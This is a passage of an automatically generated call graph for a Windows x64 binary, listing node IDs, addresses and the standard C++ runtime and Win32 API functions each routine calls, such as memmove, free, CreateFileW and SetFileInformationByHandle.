10396 7ff6f18b7727 10402 7ff6f18cdfc4 ISource free 10396->10402 10397->10396 10398 7ff6f18b772c 10397->10398 10401 7ff6f18b7720 _invalid_parameter_noinfo_noreturn 10397->10401 10399 7ff6f18b776b 10398->10399 10403 7ff6f18b7766 10398->10403 10406 7ff6f18b775f _invalid_parameter_noinfo_noreturn 10398->10406 10400 7ff6f18b77aa 10399->10400 10404 7ff6f18b77a5 10399->10404 10408 7ff6f18b779e _invalid_parameter_noinfo_noreturn 10399->10408 10405 7ff6f18b77f9 10400->10405 10410 7ff6f18b77f4 10400->10410 10414 7ff6f18b77ed _invalid_parameter_noinfo_noreturn 10400->10414 10401->10396 10402->10398 10407 7ff6f18cdfc4 ISource free 10403->10407 10409 7ff6f18cdfc4 ISource free 10404->10409 10411 7ff6f18b7848 10405->10411 10412 7ff6f18b7843 10405->10412 10416 7ff6f18b783c _invalid_parameter_noinfo_noreturn 10405->10416 10406->10403 10407->10399 10408->10404 10409->10400 10415 7ff6f18cdfc4 ISource free 10410->10415 10413 7ff6f18cdbf0 Concurrency::wait 8 API calls 10411->10413 10417 7ff6f18cdfc4 ISource free 10412->10417 10418 7ff6f18b7861 _CxxThrowException 10413->10418 10414->10410 10415->10405 10416->10412 10417->10411 10418->10290 10421 7ff6f18b0022 10420->10421 10427 7ff6f18b007a 10420->10427 10422 7ff6f18cdbf0 Concurrency::wait 8 API calls 10421->10422 10423 7ff6f18b005f 10422->10423 10423->10381 10423->10382 10425 7ff6f18b0180 memmove 10425->10427 10427->10425 10428 7ff6f18b0211 _invalid_parameter_noinfo_noreturn 10427->10428 10429 7ff6f18cdfc4 ISource free 10427->10429 10430 7ff6f18b0218 10427->10430 10431 7ff6f18cdeb0 __std_exception_copy malloc _CxxThrowException std::_Facet_Register 10427->10431 10433 7ff6f18b022b 10427->10433 10428->10430 10429->10427 10432 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10430->10432 10431->10427 10432->10433 10494 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10433->10494 10435 7ff6f18ace88 memmove memmove 10434->10435 10439 7ff6f18ace07 10434->10439 10435->10386 10436 7ff6f18ace1c 10440 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10436->10440 10437 7ff6f18ace37 10437->10435 10438 7ff6f18ace7d 10442 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10438->10442 10439->10436 10439->10437 10439->10438 10441 7ff6f18acec9 10439->10441 10443 7ff6f18ace32 10440->10443 10444 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10441->10444 10442->10437 10443->10437 10445 7ff6f18ace76 _invalid_parameter_noinfo_noreturn 10443->10445 10446 7ff6f18acece 10444->10446 10445->10438 10448 7ff6f18ae210 10447->10448 10449 7ff6f18ae0be 10447->10449 10495 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10448->10495 10453 7ff6f18ae10e 10449->10453 10455 7ff6f18ae157 10449->10455 10456 7ff6f18ae11b 10449->10456 10462 7ff6f18ae128 10449->10462 10451 7ff6f18ae215 10454 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10451->10454 10452 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10452->10453 10457 7ff6f18ae1c9 _invalid_parameter_noinfo_noreturn 10453->10457 10460 7ff6f18ae1d0 memmove memmove 10453->10460 10461 7ff6f18ae17c memmove memmove 10453->10461 10459 7ff6f18ae21b 10454->10459 10458 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10455->10458 10456->10451 10456->10462 10457->10460 10458->10453 10465 7ff6f18ae1c7 10460->10465 10463 7ff6f18ae1bc 10461->10463 10464 7ff6f18ae1a7 10461->10464 10462->10452 10466 7ff6f18cdfc4 ISource free 10463->10466 10464->10457 10464->10463 10465->10389 10466->10465 10468 7ff6f18b0295 10467->10468 10469 7ff6f18b02ea 10467->10469 10468->10469 10472 7ff6f18b029a memmove 10468->10472 10470 7ff6f18b02f2 memmove 10469->10470 10471 7ff6f18b0346 10469->10471 10473 7ff6f18b032f memmove 10470->10473 10474 7ff6f18b032c 10470->10474 10475 7ff6f18b035f 10471->10475 10476 7ff6f18b042d 10471->10476 10477 7ff6f18b040d 10472->10477 10473->10477 10474->10473 10482 7ff6f18b0432 10475->10482 10483 7ff6f18b03c7 10475->10483 10489 7ff6f18b036b 10475->10489 10490 7ff6f18b0386 memmove 10475->10490 10496 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10476->10496 10477->10395 10481 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10487 7ff6f18b0381 10481->10487 10488 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10482->10488 10484 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10483->10484 10484->10490 10485 7ff6f18b03f9 10486 7ff6f18b03fc memmove 10485->10486 10486->10477 10487->10490 10491 7ff6f18b03c0 _invalid_parameter_noinfo_noreturn 10487->10491 10492 7ff6f18b0438 10488->10492 10489->10481 10490->10485 10490->10486 10491->10483 10502 7ff6f18b96f0 10497->10502 10499 7ff6f18cdbf0 Concurrency::wait 8 API calls 10500 7ff6f18b1231 10499->10500 10500->9747 10503 7ff6f18b96f9 10502->10503 10507 7ff6f18b1223 10502->10507 10504 7ff6f18b9747 10503->10504 10509 7ff6f18b1bb0 10503->10509 10528 7ff6f18caa20 QueryPerformanceCounter 10504->10528 10506 7ff6f18b9775 _time64 10506->10507 10507->10499 10510 7ff6f18b1be3 10509->10510 10511 7ff6f18b1bf2 10510->10511 10512 7ff6f18b1c2f 10510->10512 10513 7ff6f18cdbf0 Concurrency::wait 8 API calls 10511->10513 10555 7ff6f18aaec0 10512->10555 10514 7ff6f18b1c17 10513->10514 10514->10504 10519 7ff6f18b1cb3 10520 7ff6f18b1ce6 10519->10520 10521 7ff6f18b1cbd 10519->10521 10598 7ff6f18b0680 10520->10598 10562 7ff6f18c48c0 10521->10562 10522 7ff6f18b1cca 10523 7ff6f18cdbf0 Concurrency::wait 8 API calls 10522->10523 10524 7ff6f18b1cda 10523->10524 10524->10504 10529 7ff6f18caa4f 10528->10529 10530 7ff6f18caa6c GetLastError 10528->10530 10531 7ff6f18cdbf0 Concurrency::wait 8 API calls 10529->10531 10532 7ff6f18affd0 15 API calls 10530->10532 10533 7ff6f18caa64 10531->10533 10534 7ff6f18caa84 10532->10534 10533->10506 10669 7ff6f18afb90 10534->10669 10539 7ff6f18cab35 10540 7ff6f18ce660 3 API calls 10539->10540 10542 7ff6f18cab41 10540->10542 10541 7ff6f18cdbf0 Concurrency::wait 8 API calls 10543 7ff6f18cab13 10541->10543 10544 7ff6f18cab4a QueryPerformanceFrequency 10542->10544 10549 7ff6f18caafc 10542->10549 10543->10506 10545 7ff6f18cab60 GetLastError 10544->10545 10546 7ff6f18cab1b 10544->10546 10548 7ff6f18affd0 15 API calls 10545->10548 10676 7ff6f18ce5f4 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 10546->10676 10550 7ff6f18cab78 10548->10550 10549->10541 10551 7ff6f18afb90 16 API calls 10550->10551 10552 7ff6f18cab8d 10551->10552 10553 7ff6f18a3a00 22 API calls 10552->10553 10554 7ff6f18caba0 _CxxThrowException 10553->10554 10556 7ff6f18aaee0 10555->10556 10556->10556 10635 7ff6f18aada0 10556->10635 10558 7ff6f18aaef4 10559 7ff6f18a3af0 10558->10559 10560 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10559->10560 10561 7ff6f18a3b1e _CxxThrowException 10560->10561 10561->10519 10563 7ff6f18c48ee 10562->10563 10567 7ff6f18c490c 10562->10567 10564 7ff6f18c48f3 free 10563->10564 10565 7ff6f18c4902 10563->10565 10564->10565 10566 7ff6f18b8a50 5 API calls 10565->10566 10566->10567 10568 7ff6f18c495a 10567->10568 10572 7ff6f18c4969 10567->10572 10639 7ff6f18b8a40 10567->10639 10569 7ff6f18afac0 30 API calls 10568->10569 10569->10572 10576 7ff6f18c4995 10572->10576 10642 7ff6f18c92d0 10572->10642 10573 7ff6f18c49e8 10574 7ff6f18c4a57 memset 10573->10574 10578 7ff6f18c49f8 _errno 10573->10578 10579 7ff6f18c4a06 10573->10579 10648 7ff6f18b9390 10574->10648 10575 7ff6f18c49ae 10575->10573 10581 7ff6f18c49b7 10575->10581 10576->10573 10576->10575 10580 7ff6f18c92d0 8 API calls 10576->10580 10582 7ff6f18c4a51 _invalid_parameter_noinfo 10578->10582 10583 7ff6f18c4a20 memset 10579->10583 10585 7ff6f18c4a10 memmove 10579->10585 10580->10575 10646 7ff6f18ccab0 memmove 10581->10646 10582->10574 10586 7ff6f18c4a40 10583->10586 10587 7ff6f18c4a32 _errno 10583->10587 10585->10574 10586->10574 10588 7ff6f18c4a45 _errno 10586->10588 10587->10582 10588->10582 10589 7ff6f18c49c5 10589->10522 10591 7ff6f18b9390 3 API calls 10592 7ff6f18c4d37 10591->10592 10593 7ff6f18b9390 3 API calls 10592->10593 10594 7ff6f18c4d54 10593->10594 10595 7ff6f18c533c 10594->10595 10596 7ff6f18c92d0 8 API calls 10594->10596 10595->10589 10597 7ff6f18b9390 3 API calls 10595->10597 10596->10595 10597->10589 10653 7ff6f18b9980 10598->10653 10601 7ff6f18b0921 10667 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10601->10667 10602 7ff6f18b06df 10605 7ff6f18acdb0 6 API calls 10602->10605 10607 7ff6f18b0716 10605->10607 10608 7ff6f18b0240 10 API calls 10607->10608 10610 7ff6f18b072b 10608->10610 10611 7ff6f18b0740 memmove 10610->10611 10612 7ff6f18b0777 10610->10612 10613 7ff6f18b0798 10611->10613 10614 7ff6f18ae090 Concurrency::wait 10 API calls 10612->10614 10615 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10613->10615 10614->10613 10616 7ff6f18b07df 10615->10616 10617 7ff6f18b0823 10616->10617 10619 7ff6f18b0828 10616->10619 10621 7ff6f18b081c _invalid_parameter_noinfo_noreturn 10616->10621 10622 7ff6f18cdfc4 ISource free 10617->10622 10618 7ff6f18b0862 10624 7ff6f18cdfc4 ISource free 10618->10624 10619->10618 10623 7ff6f18b085b _invalid_parameter_noinfo_noreturn 10619->10623 10626 7ff6f18b0867 10619->10626 10620 7ff6f18b08b6 10627 7ff6f18b08f5 10620->10627 10631 7ff6f18b08f0 10620->10631 10634 7ff6f18b08e9 _invalid_parameter_noinfo_noreturn 10620->10634 10621->10617 10622->10619 10623->10618 10624->10626 10625 7ff6f18b08b1 10630 7ff6f18cdfc4 ISource free 10625->10630 10626->10620 10626->10625 10629 7ff6f18b08aa _invalid_parameter_noinfo_noreturn 10626->10629 10628 7ff6f18cdbf0 Concurrency::wait 8 API calls 10627->10628 10633 7ff6f18b090e _CxxThrowException 10628->10633 10629->10625 10630->10620 10632 7ff6f18cdfc4 ISource free 10631->10632 10632->10627 10634->10631 10636 7ff6f18aae02 10635->10636 10637 7ff6f18aadc3 memmove 10635->10637 10636->10558 10637->10558 10640 7ff6f18b8a45 _aligned_free 10639->10640 10641 7ff6f18b8a4c 10639->10641 10640->10641 10641->10568 10645 7ff6f18c9306 10642->10645 10643 7ff6f18cdbf0 Concurrency::wait 8 API calls 10644 7ff6f18c9654 10643->10644 10644->10576 10645->10643 10647 7ff6f18ccb44 10646->10647 10647->10589 10649 7ff6f18b94b9 10648->10649 10652 7ff6f18b93a4 10648->10652 10650 7ff6f18b94e7 _errno _invalid_parameter_noinfo 10649->10650 10651 7ff6f18b94e0 memset 10649->10651 10649->10652 10650->10652 10651->10650 10652->10591 10652->10594 10654 7ff6f18b99d2 10653->10654 10660 7ff6f18b9a20 10653->10660 10655 7ff6f18cdbf0 Concurrency::wait 8 API calls 10654->10655 10656 7ff6f18b06c1 10655->10656 10656->10601 10656->10602 10658 7ff6f18b9b31 memmove 10658->10660 10660->10658 10661 7ff6f18b9bc9 _invalid_parameter_noinfo_noreturn 10660->10661 10662 7ff6f18cdfc4 ISource free 10660->10662 10663 7ff6f18cdeb0 __std_exception_copy malloc _CxxThrowException std::_Facet_Register 10660->10663 10664 7ff6f18b9bd0 10660->10664 10666 7ff6f18b9be3 10660->10666 10661->10664 10662->10660 10663->10660 10665 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10664->10665 10665->10666 10668 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10666->10668 10670 7ff6f18afbb0 10669->10670 10670->10670 10677 7ff6f18accb0 10670->10677 10672 7ff6f18afbc6 10673 7ff6f18a3a00 10672->10673 10674 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10673->10674 10675 7ff6f18a3a2d _CxxThrowException 10674->10675 10675->10539 10675->10549 10678 7ff6f18accd5 10677->10678 10679 7ff6f18acda6 10677->10679 10681 7ff6f18acd81 10678->10681 10685 7ff6f18acce8 memmove memmove memmove 10678->10685 10707 7ff6f18aaea0 ?_Xout_of_range@std@@YAXPEBD 10679->10707 10687 7ff6f18ad970 10681->10687 10685->10672 10688 7ff6f18adb25 10687->10688 10692 7ff6f18ad9ac 10687->10692 10708 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10688->10708 10690 7ff6f18ada12 10693 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10690->10693 10691 7ff6f18adb2a 10697 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10691->10697 10692->10690 10694 7ff6f18ada41 10692->10694 10695 7ff6f18ada05 10692->10695 10696 7ff6f18ad9f8 10692->10696 10693->10696 10699 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10694->10699 10695->10690 10695->10691 10698 7ff6f18adacf _invalid_parameter_noinfo_noreturn 10696->10698 10701 7ff6f18ada70 memmove memmove memmove 10696->10701 10702 7ff6f18adad6 memmove memmove memmove 10696->10702 10700 7ff6f18adb30 10697->10700 10698->10702 10699->10696 10704 7ff6f18adac2 10701->10704 10705 7ff6f18adaad 10701->10705 10703 7ff6f18acd96 10702->10703 10703->10672 10706 7ff6f18cdfc4 ISource free 10704->10706 10705->10698 10705->10704 10706->10703 10712 7ff6f18cdd2c IsProcessorFeaturePresent 10709->10712 10713 7ff6f18cdd43 10712->10713 10718 7ff6f18cddcc RtlCaptureContext RtlLookupFunctionEntry 10713->10718 10719 7ff6f18cdd57 10718->10719 10720 7ff6f18cddfc RtlVirtualUnwind 10718->10720 10721 7ff6f18cdc10 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10719->10721 10720->10719 10725 7ff6f18b8990 10722->10725 10724 7ff6f18ce9b2 _CxxThrowException 10725->10724 10727 7ff6f18aca6e ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 10726->10727 10728 7ff6f18ac995 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 10726->10728 10734 7ff6f18aca31 10727->10734 10729 7ff6f18ab860 18 API calls 10728->10729 10731 7ff6f18aca21 ?always_noconv@codecvt_base@std@ 10729->10731 10730 7ff6f18cdbf0 Concurrency::wait 8 API calls 10732 7ff6f18a65d5 memset 10730->10732 10733 7ff6f18aca37 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10731->10733 10731->10734 10732->9895 10733->10734 10734->10730 10736 7ff6f18aab22 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 10735->10736 10737 7ff6f18aaa49 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 10735->10737 10743 7ff6f18aaae5 10736->10743 10738 7ff6f18ab860 18 API calls 10737->10738 10739 7ff6f18aaad5 ?always_noconv@codecvt_base@std@ 10738->10739 10741 7ff6f18aaaeb ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10739->10741 10739->10743 10740 7ff6f18cdbf0 Concurrency::wait 8 API calls 10742 7ff6f18a6699 10740->10742 10741->10743 10742->9905 10742->9907 10742->9911 10743->10740 10745 7ff6f18b9510 34 API calls 10744->10745 10746 7ff6f18a53bd 10745->10746 10747 7ff6f18b7a80 69 API calls 10746->10747 10748 7ff6f18a53da 10747->10748 10749 7ff6f18b11d0 99 API calls 10748->10749 10750 7ff6f18a53f1 memset 10749->10750 10843 7ff6f18a5820 10750->10843 10755 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10756 7ff6f18a5483 10755->10756 10757 7ff6f18b0440 27 API calls 10756->10757 10758 7ff6f18a549f 10757->10758 10859 7ff6f18b38e0 10758->10859 10761 7ff6f18abf80 7 API calls 10762 7ff6f18a55bc 10761->10762 10763 7ff6f18aada0 Concurrency::wait memmove 10762->10763 10764 7ff6f18a55d9 10763->10764 10765 7ff6f18a5641 10764->10765 10766 7ff6f18cdfc4 ISource free 10764->10766 10770 7ff6f18a5690 _invalid_parameter_noinfo_noreturn 10764->10770 10767 7ff6f18a5697 10765->10767 10769 7ff6f18a569c 10765->10769 10765->10770 10766->10765 10772 7ff6f18cdfc4 ISource free 10767->10772 10768 7ff6f18a56dd 10872 7ff6f18a4480 10768->10872 10769->10768 10773 7ff6f18a56d8 10769->10773 10776 7ff6f18a56d1 _invalid_parameter_noinfo_noreturn 10769->10776 10770->10767 10772->10769 10774 7ff6f18cdfc4 ISource free 10773->10774 10774->10768 10775 7ff6f18a570e 10883 7ff6f18a4360 10775->10883 10776->10773 10778 7ff6f18a5717 10888 7ff6f18a9e20 10778->10888 10783 7ff6f18a57dd 10787 7ff6f18cdbf0 Concurrency::wait 8 API calls 10783->10787 10784 7ff6f18a57d8 10785 7ff6f18cdfc4 ISource free 10784->10785 10785->10783 10786 7ff6f18a57d1 _invalid_parameter_noinfo_noreturn 10786->10784 10788 7ff6f18a5809 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J 10787->10788 10788->9939 10958 7ff6f18cd900 CreateFileW 10789->10958 10792 7ff6f18cd9a3 10794 7ff6f18cd9a6 SetFileInformationByHandle 10792->10794 10804 7ff6f18cd9cc 10792->10804 10793 7ff6f18cdb4d 10803 7ff6f18cdb6f abort ??1_Lockit@std@@QEAA 10793->10803 10796 7ff6f18cda48 GetLastError 10794->10796 10794->10804 10795 7ff6f18cd900 __std_fs_open_handle 2 API calls 10795->10792 10797 7ff6f18cda55 10796->10797 10797->10804 10961 7ff6f18cd24c SetFileInformationByHandle 10797->10961 10798 7ff6f18cda22 10802 7ff6f18cdbf0 Concurrency::wait 8 API calls 10798->10802 10800 7ff6f18cda14 CloseHandle 10800->10798 10800->10803 10805 7ff6f18a69d9 10802->10805 10804->10798 10804->10800 10805->9949 10805->9950 10806 7ff6f18cda85 GetFileInformationByHandleEx 10809 7ff6f18cda9e 10806->10809 10807 7ff6f18cdaa2 GetLastError 10807->10809 10808 7ff6f18cdad4 SetFileInformationByHandle 10808->10809 10809->10798 10809->10807 10809->10808 10810 7ff6f18cdab5 CloseHandle 10809->10810 10811 7ff6f18cd24c 4 API calls 10809->10811 10813 7ff6f18cdb0a SetFileInformationByHandle 10809->10813 10814 7ff6f18cdb38 GetLastError 10809->10814 10810->10798 10812 7ff6f18cdac6 abort 10810->10812 10811->10809 10812->10809 10813->10807 10813->10809 10814->10804 10816 7ff6f18a6cb6 10815->10816 10817 7ff6f18a6cf3 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 10816->10817 10818 7ff6f18aac50 std::bad_exception::bad_exception 12 API calls 10816->10818 10818->10817 10820 7ff6f18ab705 10819->10820 10821 7ff6f18cd2c4 __std_fs_code_page 2 API calls 10820->10821 10822 7ff6f18ab711 10821->10822 10823 7ff6f18ab7ac 10822->10823 10842 7ff6f18ab844 10822->10842 10967 7ff6f18cd334 10822->10967 10982 7ff6f18ad4d0 10823->10982 10829 7ff6f18ab84a 10833 7ff6f18a1ba0 12 API calls 10829->10833 10830 7ff6f18a6c16 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 10830->9925 10831 7ff6f18ab81e 10835 7ff6f18cdfc4 ISource free 10831->10835 10837 7ff6f18ab856 10833->10837 10834 7ff6f18ab817 _invalid_parameter_noinfo_noreturn 10834->10831 10835->10830 10836 7ff6f18ab77b 10838 7ff6f18cd334 __std_fs_convert_wide_to_narrow 5 API calls 10836->10838 10839 7ff6f18ab79d 10838->10839 10839->10823 10840 7ff6f18ab83b 10839->10840 11001 7ff6f18a1ba0 10840->11001 11005 7ff6f18a18c0 10842->11005 10844 7ff6f18b0440 27 API calls 10843->10844 10845 7ff6f18a5843 10844->10845 10846 7ff6f18b0440 27 API calls 10845->10846 10847 7ff6f18a584e 10846->10847 10848 7ff6f18b0440 27 API calls 10847->10848 10849 7ff6f18a58b4 10848->10849 10850 7ff6f18b0440 27 API calls 10849->10850 10851 7ff6f18a58bf 10850->10851 10852 7ff6f18b0440 27 API calls 10851->10852 10853 7ff6f18a5428 10852->10853 10854 7ff6f18b1d20 10853->10854 10897 7ff6f18adf60 10854->10897 10856 7ff6f18a5468 memset 10856->10755 10857 7ff6f18b1dcf free 10857->10856 10858 7ff6f18b1d80 10858->10856 10858->10857 10911 7ff6f18b3ec0 10859->10911 10861 7ff6f18b3915 10862 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10861->10862 10863 7ff6f18b3943 10862->10863 10864 7ff6f18b395d 10863->10864 10865 7ff6f18b0440 27 API calls 10863->10865 10866 7ff6f18b0440 27 API calls 10864->10866 10865->10864 10867 7ff6f18b3995 10866->10867 10868 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10867->10868 10869 7ff6f18b39fd 10868->10869 10870 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10869->10870 10871 7ff6f18a54ee 10870->10871 10871->10761 10873 7ff6f18a44ee 10872->10873 10874 7ff6f18a44ba 10872->10874 10875 7ff6f18a4545 10873->10875 10876 7ff6f18a45af _invalid_parameter_noinfo_noreturn 10873->10876 10878 7ff6f18a453d 10873->10878 10874->10876 10877 7ff6f18cdfc4 ISource free 10874->10877 10879 7ff6f18a4590 10875->10879 10880 7ff6f18a4580 free 10875->10880 10882 7ff6f18a45d3 10876->10882 10877->10873 10881 7ff6f18cdfc4 ISource free 10878->10881 10879->10775 10880->10879 10881->10875 10882->10775 10884 7ff6f18a43c1 10883->10884 10885 7ff6f18a43b1 free 10883->10885 10886 7ff6f18a43fc 10884->10886 10887 7ff6f18a43ec free 10884->10887 10885->10884 10886->10778 10887->10886 10889 7ff6f18a9e7a 10888->10889 10890 7ff6f18a5792 10889->10890 10891 7ff6f18b8a40 std::exception_ptr::_Current_exception _aligned_free 10889->10891 10892 7ff6f18a4a70 10890->10892 10891->10890 10893 7ff6f18a4ac3 10892->10893 10894 7ff6f18a4ab3 free 10892->10894 10895 7ff6f18a4ae8 10893->10895 10896 7ff6f18b8a40 std::exception_ptr::_Current_exception _aligned_free 10893->10896 10894->10893 10895->10783 10895->10784 10895->10786 10896->10895 10898 7ff6f18adf95 10897->10898 10899 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10898->10899 10900 7ff6f18adfa2 10899->10900 10902 7ff6f18adff8 10900->10902 10903 7ff6f18ae2f0 10900->10903 10902->10858 10904 7ff6f18ae319 10903->10904 10905 7ff6f18ae32b 10903->10905 10904->10902 10906 7ff6f18b8a50 5 API calls 10905->10906 10907 7ff6f18ae330 10906->10907 10908 7ff6f18ae389 10907->10908 10909 7ff6f18ae354 memmove 10907->10909 10910 7ff6f18ae36a memset _errno _invalid_parameter_noinfo 10907->10910 10908->10902 10909->10902 10910->10908 10929 7ff6f18b3ba0 10911->10929 10913 7ff6f18b3ef7 10914 7ff6f18b4038 10913->10914 10920 7ff6f18b3f73 10913->10920 10915 7ff6f18aa250 7 API calls 10914->10915 10916 7ff6f18b4049 10915->10916 10917 7ff6f18a3a90 22 API calls 10916->10917 10918 7ff6f18b4059 _CxxThrowException 10917->10918 10919 7ff6f18b40f0 10918->10919 10921 7ff6f18b411d 10919->10921 10922 7ff6f18cdfc4 ISource free 10919->10922 10932 7ff6f18b37e0 10920->10932 10921->10861 10922->10921 10924 7ff6f18b3ff1 10936 7ff6f18b4eb0 10924->10936 10926 7ff6f18b3ffd 10927 7ff6f18cdbf0 Concurrency::wait 8 API calls 10926->10927 10928 7ff6f18b4027 10927->10928 10928->10861 10930 7ff6f18b0440 27 API calls 10929->10930 10931 7ff6f18b3bb7 10930->10931 10931->10913 10933 7ff6f18b3815 10932->10933 10934 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10933->10934 10935 7ff6f18b3822 10934->10935 10935->10924 10937 7ff6f18b4eee 10936->10937 10938 7ff6f18b4f3a 10937->10938 10941 7ff6f18b4f05 10937->10941 10939 7ff6f18aa250 7 API calls 10938->10939 10940 7ff6f18b4f4b 10939->10940 10943 7ff6f18a3a90 22 API calls 10940->10943 10949 7ff6f18b6380 10941->10949 10945 7ff6f18b4f5b _CxxThrowException 10943->10945 10948 7ff6f18b4f9c 10945->10948 10946 7ff6f18cdbf0 Concurrency::wait 8 API calls 10947 7ff6f18b4f27 10946->10947 10947->10926 10948->10926 10952 7ff6f18af230 10949->10952 10953 7ff6f18af270 10952->10953 10954 7ff6f18af24d 10952->10954 10953->10946 10955 7ff6f18af252 free 10954->10955 10956 7ff6f18af26b 10954->10956 10955->10956 10956->10953 10957 7ff6f18b8a50 5 API calls 10956->10957 10957->10953 10959 7ff6f18cd942 GetLastError 10958->10959 10960 7ff6f18cd94a 10958->10960 10959->10960 10960->10792 10960->10793 10960->10795 10962 7ff6f18cd276 GetLastError 10961->10962 10964 7ff6f18cd2bb 10961->10964 10963 7ff6f18cd292 SetFileInformationByHandle 10962->10963 10965 7ff6f18cd283 10962->10965 10963->10964 10966 7ff6f18cd2b3 GetLastError 10963->10966 10964->10804 10964->10806 10965->10963 10965->10964 10966->10964 10968 7ff6f18cd3b2 WideCharToMultiByte 10967->10968 10969 7ff6f18cd35b 10967->10969 10971 7ff6f18cd3e3 10968->10971 10969->10968 10970 7ff6f18cd363 WideCharToMultiByte 10969->10970 10970->10971 10972 7ff6f18ab75c 10970->10972 10973 7ff6f18cd3ef 10971->10973 10974 7ff6f18cd3e7 GetLastError 10971->10974 10972->10829 10977 7ff6f18aad10 10972->10977 10973->10972 10975 7ff6f18cd3fc WideCharToMultiByte 10973->10975 10974->10973 10975->10972 10976 7ff6f18cd429 GetLastError 10975->10976 10976->10972 10978 7ff6f18aad34 10977->10978 10979 7ff6f18aad1d 10977->10979 10980 7ff6f18aad86 10978->10980 10981 7ff6f18aad60 memset 10978->10981 10979->10836 10980->10836 10981->10836 10984 7ff6f18ad506 ?good@ios_base@std@ 10982->10984 10985 7ff6f18ad578 10984->10985 10991 7ff6f18ad5a6 10984->10991 10986 7ff6f18ad58e ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 10985->10986 10985->10991 10986->10991 10988 7ff6f18ad5fd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 10998 7ff6f18ad5f1 10988->10998 10989 7ff6f18ab7e0 10989->10830 10989->10831 10989->10834 10990 7ff6f18ad71d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 10990->10989 10991->10988 10992 7ff6f18ad5d5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 10991->10992 11000 7ff6f18ad5b0 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 10991->11000 10992->10991 10992->10998 10993 7ff6f18ad67e 10994 7ff6f18ad689 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 10993->10994 10993->11000 10996 7ff6f18ad6a5 10994->10996 10995 7ff6f18ad642 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 10995->10993 10999 7ff6f18ad65e ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 10995->10999 10997 7ff6f18ad6b5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 10996->10997 10996->11000 10997->10996 10997->11000 10998->10993 10998->10995 10998->10999 10999->10993 10999->10998 11000->10989 11000->10990 11002 7ff6f18a1bb0 11001->11002 11009 7ff6f18a17d0 11002->11009 11006 7ff6f18a18ce 11005->11006 11007 7ff6f18a17d0 11 API calls 11006->11007 11008 7ff6f18a18e5 _CxxThrowException __std_exception_copy 11007->11008 11008->10829 11010 7ff6f18a1806 __std_exception_copy 11009->11010 11011 7ff6f18a1855 11010->11011 11012 7ff6f18a188a 11010->11012 11014 7ff6f18a1885 11011->11014 11015 7ff6f18a187e _invalid_parameter_noinfo_noreturn 11011->11015 11013 7ff6f18cdbf0 Concurrency::wait 8 API calls 11012->11013 11017 7ff6f18a18ab _CxxThrowException 11013->11017 11016 7ff6f18cdfc4 ISource free 11014->11016 11015->11014 11016->11012 11021 7ff6f18cd322 11020->11021 11022 7ff6f18cd316 GetLastError 11020->11022 11021->10042 11022->11021 11024 7ff6f18a23a3 11023->11024 11025 7ff6f18a2494 11024->11025 11029 7ff6f18a23b9 11024->11029 11083 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 11025->11083 11027 7ff6f18a23bf 11027->10048 11028 7ff6f18a2499 11030 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11028->11030 11029->11027 11029->11028 11031 